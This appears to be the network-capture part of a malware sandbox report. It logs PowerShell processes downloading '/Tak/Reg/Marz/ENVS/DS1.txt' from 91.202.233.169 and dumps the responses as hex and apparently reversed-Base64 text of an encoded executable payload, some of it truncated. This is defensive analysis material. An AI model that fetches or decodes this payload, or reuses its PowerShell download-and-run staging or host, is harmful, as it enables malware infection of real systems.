                                    Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7AMAAAADAAAwAAAAAAAAAAAAAoQD+kHbi1WZzNXYvwjCNoQD+0SLgAiCN4Tej5WZk5WZwVGZvwDIgoQD+kHbi1WZzNXQ05WZk5WZwVGZvwDIgACIK0gPvACIgACIgACIK0gIqISPldWY1dmbhxGIgACIgACIgACIK0gImRWMmN2Y0QTM0YjY1kTN2ISPuV2avRVelt0YpxmY1BHIgACIgACIgACIK0gIqISPlJXd0NWZ0lGajJXQy92czV2YvJHcgACIgACIgACIgoQDiAjLw4CMuYjI942bpNnclZ
                                    Sep 26, 2024 10:57:03.208188057 CEST224INData Raw: 48 49 67 41 43 49 67 41 43 49 67 41 43 49 4b 30 67 49 7a 78 32 62 79 52 6e 62 76 4e 55 4c 75 39 57 62 74 39 32 51 75 4d 33 64 76 52 6d 62 70 64 6c 4c 30 5a 32 62 7a 39 6d 63 6a 6c 57 54 69 30 54 5a 74 46 6d 62 67 41 43 49 67 41 43 49 67 41 43 49
                                    Data Ascii: HIgACIgACIgACIK0gIzx2byRnbvNULu9Wbt92QuM3dvRmbpdlL0Z2bz9mcjlWTi0TZtFmbgACIgACIgACIgoQDiIzMul2di0TZwlHdgACIgACIgACIgoQD5RXa05WZklUesJWblN3chxDIgACIgAiCN4TesJWblN3cBRnblRmblBXZkxDIgACIK0gP5NmblRmblBXZkxDIgoQDt0SI8ACIK0gPt0CIpI
                                    Sep 26, 2024 10:57:03.208201885 CEST1236INData Raw: 58 5a 30 46 47 62 67 51 6d 62 68 42 43 55 59 42 79 63 33 39 47 5a 75 6c 32 56 6f 41 79 63 6e 39 47 62 68 6c 47 5a 67 51 6d 62 68 42 79 63 73 39 6d 63 30 35 32 62 6a 42 69 62 76 31 57 62 76 4e 47 49 7a 64 33 62 6b 35 57 61 58 42 69 63 76 5a 47 49
                                    Data Ascii: XZ0FGbgQmbhBCUYByc39GZul2VoAycn9GbhlGZgQmbhBycs9mc052bjBibv1WbvNGIzd3bk5WaXBicvZGIzVWblhGdgUGbiFmbFBSLtECPgAiCNoQDK0gPu9Wa0F2YpxGcwF2L8ACIK0gPzdmbpRHdlN1c39GZul2dvwDIgACIK0gPlJXY3FEa0FGUn52bs9CPlVnc05jIzdmbpRHdlN1c39GZul2VvYTMwIzLJ10Uv02bj5Cdm
                                    Sep 26, 2024 10:57:03.208216906 CEST224INData Raw: 58 59 6a 6c 47 62 77 42 58 59 67 55 47 61 30 42 43 64 68 68 47 64 67 4d 58 5a 30 46 32 59 70 52 6d 62 4a 42 53 4c 74 45 43 50 67 41 69 43 4e 6f 51 44 2b 6b 48 64 70 78 57 61 69 6c 47 64 68 42 58 62 76 4e 32 4c 38 41 43 49 4b 30 67 50 75 39 57 61
                                    Data Ascii: XYjlGbwBXYgUGa0BCdhhGdgMXZ0F2YpRmbJBSLtECPgAiCNoQD+kHdpxWailGdhBXbvN2L8ACIK0gPu9Wa0F2YpxGcwF2L8ACIgAiCNoQD+0SL+8CIi0XY5EWNxEGM1QmZ4QTL1EWOi1COlZGNtMjYmJWLyETY3YGMlhzei0DZJByUPRWZ0J3bwBXdzxTLtECPgACIgACIK0gPt0CIwEDIzd3bk5WaXB
                                    Sep 26, 2024 10:57:03.208230019 CEST1236INData Raw: 53 4c 74 45 43 50 67 41 43 49 67 41 43 49 4b 30 67 43 4e 34 54 4c 74 34 7a 4c 67 49 53 66 34 63 54 59 6b 42 44 5a 32 59 47 4d 6b 4e 44 4f 74 49 6d 59 31 6b 54 4c 35 4d 6a 4d 30 30 53 4d 6c 42 44 4f 74 59 7a 4e 6a 5a 7a 4e 32 59 57 4d 37 4a 53 50
                                    Data Ascii: SLtECPgACIgACIK0gCN4TLt4zLgISf4cTYkBDZ2YGMkNDOtImY1kTL5MjM00SMlBDOtYzNjZzN2YWM7JSPklEIT9EZlRncvBHc1NHPt0SI8ACIgACIgoQD+0SLgEjL4Ayc39GZul2Vg0SLhwDIgACIgAiCNoQD+0SL+8CIi0HOzUmNhRTY0QWO2QWLjlTYi1SM0QDNtkjYzUTLzUGOyYmMhRzei0DZJByUPRWZ0J3bwBXdzxTLt
                                    Sep 26, 2024 10:57:03.208288908 CEST1236INData Raw: 57 62 6c 68 32 59 7a 70 6a 62 79 56 6e 49 39 4d 6e 62 73 31 47 65 67 4d 58 5a 6e 56 47 62 70 5a 58 61 79 42 46 5a 6c 52 33 63 6c 56 58 63 6c 4a 48 50 67 41 43 49 67 41 43 49 4b 30 67 50 35 52 58 61 79 56 33 59 6c 4e 48 50 67 41 43 49 67 6f 51 44
                                    Data Ascii: Wblh2YzpjbyVnI9Mnbs1GegMXZnVGbpZXayBFZlR3clVXclJHPgACIgACIK0gP5RXayV3YlNHPgACIgoQD+IiM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN2c64mc1JSPz5GbthHIvZmbJR3c1JHd8ACIK0gPvICcwFmLu9Wa0F2YpxGcwFUeNJSPl1WYuBiIw4yNuAjLxISPu9WazJXZ2BSe0lGduVGZJlHbi1WZzNXY8ACIK
                                    Sep 26, 2024 10:57:03.208311081 CEST1236INData Raw: 41 41 41 41 41 52 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 2f 41 77 42 41 41 41 41 42 41 41 41 41 63 41 41 41 41 51 41 41 41 41 41 42 41 41 41 2b 2f 4f 42 39 43 41 41 41 41 41 41
                                    Data Ascii: AAAAARAAAAAAAAAAAAAAAAAAAABAAAAQAAAAAAAAAA/AwBAAAABAAAAcAAAAQAAAAABAAA+/OB9CAAAAAAPBgRA4EAJBwXA4EAPBQSAMFASBQRAYFAfBwUAYFAAAANCQNAAAAAAAAAAAAAKMIAAMOdAAAAAAAAAAAAAIA1AAA4gCAAAAJAAAAAAEAAAAAAAAAAAAAAAAAAAAIAAgGAAAQAAEAAAAAAAAAAAAAAAAAAAAAAAAIAA
                                    Sep 26, 2024 10:57:03.208425045 CEST1236INData Raw: 69 42 35 47 6f 45 42 63 51 42 4f 55 6d 45 43 63 51 42 4e 46 52 54 52 49 67 41 41 63 51 54 52 41 41 49 45 30 6c 45 64 41 41 41 46 30 6c 45 49 30 6c 45 64 4d 77 42 49 67 67 44 42 41 43 42 4f 77 52 41 67 51 67 44 4a 49 6f 45 31 48 6f 45 39 48 6f 45
                                    Data Ascii: iB5GoEBcQBOUmECcQBNFRTRIgAAcQTRAAIE0lEdAAAF0lEI0lEdMwBIggDBACBOwRAgQgDJIoE1HoE9HoEOUwBN0jgRIQAgYQNCKRABAiB1IoEAAQBlIYEAASBO4gDCASBlIYECIwBGgACOIAIF4QZSEAIFwRHOEAAFUhgSAAAF4QBIUQHlJRBd4wBHwgDcIwBEgRVS0BCIMAIIwBCBAABBMBATIwECACCcARTRARVS0ggSEABg
                                    Sep 26, 2024 10:57:03.208439112 CEST1236INData Raw: 50 67 53 6b 50 67 53 67 51 2b 41 4b 52 48 49 34 41 43 48 51 52 42 64 34 51 42 64 49 77 41 67 67 67 44 4f 45 41 41 45 34 51 42 64 45 41 49 46 55 4f 67 53 41 41 49 46 45 4f 67 53 41 41 49 46 49 51 33 41 4b 52 32 41 4b 78 41 48 6b 51 42 64 34 51 41
                                    Data Ascii: PgSkPgSgQ+AKRHI4ACHQRBd4QBdIwAgggDOEAAE4QBdEAIFUOgSAAIFEOgSAAIFIQ3AKR2AKxAHkQBd4QAgUQ1AKBAAUgABcwAOgQAAQACBcwAAAQblRXSEAQAJAAAxUDOCJENwATQBBDMtUzMxgTLFNUMx0iQDJDNtADMBJzNyUTNkAQApAAAAAAABAQAIUMgREQAgYAAAYDOFNUMxkzQwEEMw0iQzQkQtADRxETL0gjQ10iMy
                                    Sep 26, 2024 10:57:03.208455086 CEST1236INData Raw: 51 47 53 55 52 41 41 6b 67 44 64 41 41 41 45 30 55 45 47 4d 41 42 42 65 78 41 59 59 67 41 4a 59 67 41 49 67 68 41 43 41 51 42 59 49 51 41 41 51 51 43 43 6b 41 47 44 41 67 42 73 45 42 45 59 49 67 41 41 63 51 43 4a 67 68 41 41 55 51 43 42 45 41 41
                                    Data Ascii: QGSURAAkgDdAAAE0UEGMABBexAYYgAJYgAIghACAQBYIQAAQQCCkAGDAgBsEBEYIgAAcQCJghAAUQCBEAAE4gDCIAAFEAZhVmcoRFbvJHdu92QNIAVBIRO4ATZ0MTOxYTNjVTY3cjY94WZr9GV5V2SjlGbiVHUgwCbhJHd1Vmb9Umc1RHb1NEIsAjLw4CMuQTPu9WazJXZWBCLilGby92Yz1GIsUGd1JWayRHdB52bpN3cp1mcl
                                    Sep 26, 2024 10:57:03.213269949 CEST1236INData Raw: 48 41 7a 42 51 59 41 30 32 52 41 41 41 58 41 55 47 41 79 42 51 59 41 63 48 41 30 42 67 5a 41 38 47 41 54 4e 52 41 41 4d 48 41 6e 42 67 62 41 6b 47 41 30 42 41 64 41 55 47 41 7a 42 51 4c 41 4d 48 41 74 64 42 41 41 55 47 41 73 42 51 61 41 59 47 41
                                    Data Ascii: HAzBQYA02RAAAXAUGAyBQYAcHA0BgZA8GATNRAAMHAnBgbAkGA0BAdAUGAzBQLAMHAtdBAAUGAsBQaAYGAjBwcA02DAAwcAUGAzBwcAEGAsBwQPAAAlBgcAEGA3BAdAYGAvBwURAAAyBQaAQGAuBQaAcXDAAAdA4GAlBQbA4GAvBgcAkGA2BgbAU0FAAgbAcHAvBgbAsGAuBQVPAAABBwLA40BAAAIAsTBAAQZA0GAhBgTAkHAh


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.54971891.202.233.169807896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    Sep 26, 2024 10:57:24.051206112 CEST89OUTGET /Tak/Reg/Marz/ENVS/DS1.txt HTTP/1.1
                                    Host: 91.202.233.169
                                    Connection: Keep-Alive
                                    Sep 26, 2024 10:57:24.776057959 CEST1236INHTTP/1.1 200 OK
                                    Server: nginx/1.20.2
                                    Date: Thu, 26 Sep 2024 08:57:24 GMT
                                    Content-Type: text/plain
                                    Content-Length: 64856
                                    Connection: keep-alive
                                    Last-Modified: Mon, 16 Sep 2024 11:16:55 GMT
                                    ETag: "fd58-6223ab5def7c0"
                                    Accept-Ranges: bytes
                                    Vary: Accept-Encoding
                                    Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                    Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7AMAAAADAAAwAAAAAAAAAAAAAoQD+kHbi1WZzNXYvwjCNoQD+0SLgAiCN4Tej5WZk5WZwVGZvwDIgoQD+kHbi1WZzNXQ05WZk5WZwVGZvwDIgACIK0gPvACIgACIgACIK0gIqISPldWY1dmbhxGIgACIgACIgACIK0gImRWMmN2Y0QTM0YjY1kTN2ISPuV2avRVelt0YpxmY1BHIgACIgACIgACIK0gIqISPlJXd0NWZ0lGajJXQy92czV2YvJHcgACIgACIgACIgoQDiAjLw4CMuYjI942bpNnclZ
                                    Sep 26, 2024 10:57:24.776106119 CEST1236INData Raw: 48 49 67 41 43 49 67 41 43 49 67 41 43 49 4b 30 67 49 7a 78 32 62 79 52 6e 62 76 4e 55 4c 75 39 57 62 74 39 32 51 75 4d 33 64 76 52 6d 62 70 64 6c 4c 30 5a 32 62 7a 39 6d 63 6a 6c 57 54 69 30 54 5a 74 46 6d 62 67 41 43 49 67 41 43 49 67 41 43 49
                                    Data Ascii: HIgACIgACIgACIK0gIzx2byRnbvNULu9Wbt92QuM3dvRmbpdlL0Z2bz9mcjlWTi0TZtFmbgACIgACIgACIgoQDiIzMul2di0TZwlHdgACIgACIgACIgoQD5RXa05WZklUesJWblN3chxDIgACIgAiCN4TesJWblN3cBRnblRmblBXZkxDIgACIK0gP5NmblRmblBXZkxDIgoQDt0SI8ACIK0gPt0CIpIXZ0FGbgQmbhBCUYByc3
                                    Sep 26, 2024 10:57:24.776145935 CEST1236INData Raw: 53 5a 79 46 32 64 68 31 53 53 51 52 45 49 35 78 47 62 68 4e 57 61 30 46 57 62 76 52 58 64 68 42 53 5a 79 46 47 49 7a 35 32 62 70 52 58 59 6a 6c 47 62 77 42 58 59 67 6b 69 52 51 64 46 4b 67 34 32 62 70 52 58 59 6b 35 57 64 76 5a 45 49 75 39 57 61
                                    Data Ascii: SZyF2dh1SSQREI5xGbhNWa0FWbvRXdhBSZyFGIz52bpRXYjlGbwBXYgkiRQdFKg42bpRXYk5WdvZEIu9Wa0FGduV2clJHUgM3dvRmbpdFIuMXSQREIgACIgACIK0gclh2ZphGI0FGIzd3bk5WaXBSeiBCZlxWYjNHI5xGbhNWa0FWbvRXdhBSZiBCdv5GIsxWa3BCZuFGIlJXY3FWLJBFRgMXag42bpRXYjlGbwBXYgUGa0BCdh
                                    Sep 26, 2024 10:57:24.776180029 CEST1236INData Raw: 51 44 75 39 47 49 6b 56 47 64 7a 56 47 64 67 34 57 5a 6c 4a 47 49 7a 46 47 61 67 34 32 62 70 52 58 59 6a 6c 47 62 77 42 58 59 67 4d 58 61 6f 52 48 49 30 46 47 61 30 42 79 63 75 39 57 61 7a 4a 58 5a 32 42 79 63 33 39 47 5a 75 6c 32 56 67 55 47 61
                                    Data Ascii: QDu9GIkVGdzVGdg4WZlJGIzFGag42bpRXYjlGbwBXYgMXaoRHI0FGa0Bycu9WazJXZ2Byc39GZul2VgUGa0BiZvBCdzlGbgEEIt0SI8ACIgACIgoQD+42bpRXYjlGbwBXY8ACIgAiCN4jIxYnL5RXaslmYpRXYw12bjpTbvNWL0Z2bz9mcjlWbtMXYtVGajNnOuJXdi0zcuxWb4BSe0lGbpJWa0FGct92Y8ACIK0gCN4zbm5WS0
                                    Sep 26, 2024 10:57:24.776215076 CEST1236INData Raw: 43 41 41 41 41 41 41 55 47 41 34 42 51 5a 41 34 43 41 30 42 67 62 41 55 47 41 70 42 41 62 41 4d 45 41 41 41 51 5a 41 30 47 41 68 42 67 54 41 77 47 41 68 42 67 62 41 49 48 41 6c 42 41 64 41 34 47 41 4a 42 51 41 41 73 41 41 32 41 41 41 41 41 44 41
                                    Data Ascii: CAAAAAAUGA4BQZA4CA0BgbAUGApBAbAMEAAAQZA0GAhBgTAwGAhBgbAIHAlBAdA4GAJBQAAsAA2AAAAADAuAwNA4CAwAgLAEDAAAAAA4GAvBQaAMHAyBQZAYFAlBAbAkGAGBQAAgAAwAAAAAAAAAAAA4GAvBQaAQHAwBQaAIHAjBwcAUGAEBQZAwGApBgRAEAABAgKAAAAAAAAAAAAlBQbAEGAOBQeA4GAhBAcA0GAvBwQAEAAB
                                    Sep 26, 2024 10:57:24.776251078 CEST1120INData Raw: 59 45 4f 45 41 42 67 30 51 33 42 4b 52 42 64 49 77 42 48 77 51 42 64 45 41 41 46 55 69 67 52 77 58 45 43 63 77 42 4f 30 51 41 41 51 67 43 4e 45 41 41 45 55 69 67 52 6f 51 41 41 59 41 44 4b 45 41 41 45 30 67 43 42 41 41 42 4f 6f 51 41 41 51 67 43
                                    Data Ascii: YEOEABg0Q3BKRBdIwBHwQBdEAAFUigRwXECcwBO0QAAQgCNEAAEUigRoQAAYADKEAAE0gCBAABOoQAAQgCKEAAEUigRsQAAYADLEAAE0wCBAABOsQAAQgCLEAAEwXEBcABFEQAgQACF0RBIQwBHgnE4JRAlFYEV4ACIUwBOgnEBcABIAwEBASBIgQBdMwBGwhDOIAAFUACF0RZSQwBIggACcABIgQiCKBCJKoEBUAAMUQHF0RBd
                                    Sep 26, 2024 10:57:24.776287079 CEST1236INData Raw: 52 4e 53 6f 51 4d 53 55 78 45 41 4d 68 42 44 45 5a 67 53 41 77 45 42 30 69 45 56 45 41 41 4c 34 67 44 4f 6b 6a 45 46 30 68 44 4a 49 52 44 53 77 52 4e 53 6f 51 4d 53 55 52 41 74 49 52 46 58 55 59 67 53 45 51 62 42 4b 52 46 35 46 6f 45 35 46 6f 45
                                    Data Ascii: RNSoQMSUxEAMhBDEZgSAwEB0iEVEAAL4gDOkjEF0hDJIRDSwRNSoQMSURAtIRFXUYgSEQbBKRF5FoE5FoEB0WgSUhDVGYERGoEFAAHOkYgRUYgSIAAJEYgRkXgSEAAIkXgSwRAAYgD5FoEBAiBF0RdBKRAgcQcBKBAAUAHBcwAAMhABASBAMBAgQAeSEQZBGRFHAwEBUWgRUBAgkAeSEgCEAgHB0WgSUBAeEQGSURABABEAMRAB
                                    Sep 26, 2024 10:57:24.776320934 CEST1236INData Raw: 6e 45 41 41 43 42 38 46 42 41 67 51 41 64 53 41 41 49 45 30 51 41 42 41 43 42 4d 45 51 41 67 51 67 41 42 45 41 49 45 34 41 41 67 4d 67 44 43 45 41 49 45 67 67 44 42 49 41 49 46 34 67 44 42 49 41 49 46 55 51 48 41 41 43 42 46 30 52 41 42 41 53 42
                                    Data Ascii: nEAACB8FBAgQAdSAAIE0QABACBMEQAgQgABEAIE4AAgMgDCEAIEggDBIAIF4gDBIAIFUQHAACBF0RABASBNAAIDoAAgMwCAAyALEQAgQgCBEAIE0nEBEAIF4ACBACB0JhBDwXEGMACAgyAIgnEBgSBIAAIDgAeSEAIF0AeSEAIFoAeSEAIF4AeSEAIFgnEAACB4JRAZIRF4JRACAyC4JhBDwBAoMgAAAyAcAAIDgnEBkhEVEQAg
                                    Sep 26, 2024 10:57:24.776359081 CEST1236INData Raw: 68 42 44 6b 67 45 47 4d 67 44 47 49 51 41 41 41 79 41 42 41 41 41 44 6b 49 34 30 6b 68 56 63 70 33 74 49 41 41 36 38 66 45 55 4b 75 4f 72 4a 4f 45 50 67 65 57 52 65 33 6a 36 41 41 41 41 35 41 77 59 41 51 43 41 73 41 41 4f 41 4d 47 41 6b 41 41 4c
                                    Data Ascii: hBDkgEGMgDGIQAAAyABAAADkI40khVcp3tIAA68fEUKuOrJOEPgeWRe3j6AAAA5AwYAQCAsAAOAMGAkAALAcDAjBAJAACAlBAcAkHA0BAIAkCAyAwMAgHAlBALAYDAxAAdAgHAlBALAgDA0BAeAUGAoUEAAEDAjBAJAACAlBAcAkHA0BAIAkCAkBQZAMHA1BAIAIHAlBgdAUGAuBAKrAAAgAQfAIDAYBgOAADA79AAAACA9BwMA
                                    Sep 26, 2024 10:57:24.776390076 CEST104INData Raw: 30 43 41 41 41 64 41 6b 47 41 69 42 41 4e 41 59 7a 43 41 41 51 5a 41 55 48 41 79 42 41 56 4a 41 41 41 67 4d 41 41 41 51 48 41 6d 42 77 62 41 4d 48 41 76 42 67 63 41 4d 47 41 70 42 51 54 54 41 41 41 54 42 77 54 46 41 41 41 79 42 51 5a 41 4d 48 41
                                    Data Ascii: 0CAAAdAkGAiBANAYzCAAQZAUHAyBAVJAAAgMAAAQHAmBwbAMHAvBgcAMGApBQTTAAATBwTFAAAyBQZAMHAVlAAAQEAJBwVAgUCAAwbAY
                                    Sep 26, 2024 10:57:24.781296015 CEST1236INData Raw: 47 41 75 42 51 53 41 51 48 41 75 42 51 5a 41 6b 47 41 73 42 77 51 56 41 41 41 45 42 51 53 41 63 46 41 49 42 41 49 41 49 48 41 79 42 51 52 52 41 41 41 79 41 41 65 46 41 41 41 6c 42 51 62 41 45 47 41 4f 42 51 65 41 77 47 41 6b 42 67 62 41 55 47 41
                                    Data Ascii: GAuBQSAQHAuBQZAkGAsBwQVAAAEBQSAcFAIBAIAIHAyBQRRAAAyAAeFAAAlBQbAEGAOBQeAwGAkBgbAUGApBgcAYUGBAQfAEDA1AAOAIEACBANAADAwAQQAEEAwAAMA0CA1AwMAEDA4AQLAUEADBQMAEDAtAgQAMEAyAANA0CAwAAMAEEAyAwNAIDA1AQNAsXTBAQfAYDA4AQRAMEAxAQMAkDADBAMAEEAwAAMA0CACBwMAQEAC


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.54972191.202.233.169807728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    Sep 26, 2024 10:58:03.669411898 CEST89OUTGET /Tak/Reg/Marz/ENVS/DS1.txt HTTP/1.1
                                    Host: 91.202.233.169
                                    Connection: Keep-Alive
                                    Sep 26, 2024 10:58:04.406827927 CEST1236INHTTP/1.1 200 OK
                                    Server: nginx/1.20.2
                                    Date: Thu, 26 Sep 2024 08:58:04 GMT
                                    Content-Type: text/plain
                                    Content-Length: 64856
                                    Connection: keep-alive
                                    Last-Modified: Mon, 16 Sep 2024 11:16:55 GMT
                                    ETag: "fd58-6223ab5def7c0"
                                    Accept-Ranges: bytes
                                    Vary: Accept-Encoding
                                    Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                    Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7AMAAAADAAAwAAAAAAAAAAAAAoQD+kHbi1WZzNXYvwjCNoQD+0SLgAiCN4Tej5WZk5WZwVGZvwDIgoQD+kHbi1WZzNXQ05WZk5WZwVGZvwDIgACIK0gPvACIgACIgACIK0gIqISPldWY1dmbhxGIgACIgACIgACIK0gImRWMmN2Y0QTM0YjY1kTN2ISPuV2avRVelt0YpxmY1BHIgACIgACIgACIK0gIqISPlJXd0NWZ0lGajJXQy92czV2YvJHcgACIgACIgACIgoQDiAjLw4CMuYjI942bpNnclZ
                                    Sep 26, 2024 10:58:04.406929970 CEST1236INData Raw: 48 49 67 41 43 49 67 41 43 49 67 41 43 49 4b 30 67 49 7a 78 32 62 79 52 6e 62 76 4e 55 4c 75 39 57 62 74 39 32 51 75 4d 33 64 76 52 6d 62 70 64 6c 4c 30 5a 32 62 7a 39 6d 63 6a 6c 57 54 69 30 54 5a 74 46 6d 62 67 41 43 49 67 41 43 49 67 41 43 49
                                    Data Ascii: HIgACIgACIgACIK0gIzx2byRnbvNULu9Wbt92QuM3dvRmbpdlL0Z2bz9mcjlWTi0TZtFmbgACIgACIgACIgoQDiIzMul2di0TZwlHdgACIgACIgACIgoQD5RXa05WZklUesJWblN3chxDIgACIgAiCN4TesJWblN3cBRnblRmblBXZkxDIgACIK0gP5NmblRmblBXZkxDIgoQDt0SI8ACIK0gPt0CIpIXZ0FGbgQmbhBCUYByc3
                                    Sep 26, 2024 10:58:04.406980991 CEST1236INData Raw: 53 5a 79 46 32 64 68 31 53 53 51 52 45 49 35 78 47 62 68 4e 57 61 30 46 57 62 76 52 58 64 68 42 53 5a 79 46 47 49 7a 35 32 62 70 52 58 59 6a 6c 47 62 77 42 58 59 67 6b 69 52 51 64 46 4b 67 34 32 62 70 52 58 59 6b 35 57 64 76 5a 45 49 75 39 57 61
                                    Data Ascii: SZyF2dh1SSQREI5xGbhNWa0FWbvRXdhBSZyFGIz52bpRXYjlGbwBXYgkiRQdFKg42bpRXYk5WdvZEIu9Wa0FGduV2clJHUgM3dvRmbpdFIuMXSQREIgACIgACIK0gclh2ZphGI0FGIzd3bk5WaXBSeiBCZlxWYjNHI5xGbhNWa0FWbvRXdhBSZiBCdv5GIsxWa3BCZuFGIlJXY3FWLJBFRgMXag42bpRXYjlGbwBXYgUGa0BCdh
